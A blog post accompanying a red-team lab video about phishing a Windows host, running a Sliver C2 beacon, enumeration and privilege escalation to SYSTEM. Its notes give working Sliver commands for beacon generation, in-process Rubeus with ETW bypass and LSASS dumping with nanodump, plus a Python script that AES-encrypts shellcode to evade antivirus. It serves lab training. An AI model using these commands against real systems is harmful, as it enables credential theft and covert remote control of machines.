Post

VL Shinra Part 3 - Initial Payload Design, Host Enumeration & getting SYSTEM

This is the third video of the Shinra series. We will get a shell on Ashleighs machine & escalate privileges.

Topics

  • Phishing: Payload design & getting a shell
  • Sliver Basics
  • Host enumeration
  • Switching users with runas
  • Exploiting SeDebugPrivilege to get SYSTEM
  • Post Exploitation

Additional things to try on the lab:

  • See if you can run the domain enumeration steps on client01 in contrast to using your own machine, e.g. port-scanning, bloodhound, adcs, credential spraying etc.
  • Craft a payload using any other technique so it gets around the AV
  • Craft a payload using indirect syscalls or modify the existing one so it uses DLL Hijacking instead

Notes

Sliver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# generate a beacon
generate beacon --mtls 127.0.0.1:53 --os windows --arch amd64 --format shellcode --save xct.raw

# start listener
mtls --lport 53

# execute assembly (in-process, bypasss ETW)
execute-assembly -i -E /home/xct/drop/Rubeus.exe klist|triage|...

# nanodump via armory
ps (list lsass process id)
nanodump 680 core.dmp 1 PMDM

# interactive shell (you can omit the argument to get powershell)
shell --shell-path "c:\\windows\\system32\\cmd.exe"

Encrypt Shellcode with AES

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from base64 import b64encode, b64decode
from binascii import unhexlify, hexlify
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import sys

if __name__ == "__main__":
	if len(sys.argv) < 3:
		print("Usage: ./shellcode_encrypt file key iv")
		exit(1)

	file_name = sys.argv[1]
	password = sys.argv[2].encode()
	iv = sys.argv[3].encode()

	data = []
	with open(file_name,"rb") as f:
		data = f.read()

	print(f"Key: {password}")
	print(f"IV: {iv}")	
	print(f"Data: {data[:16]}..")

	data = pad(data, AES.block_size)
	cipher = AES.new(password, AES.MODE_CBC, iv)
	cipher_text = cipher.encrypt(data)

	with open('xct.bin','wb') as f:
		f.write(cipher_text)
This post is licensed under CC BY 4.0 by the author.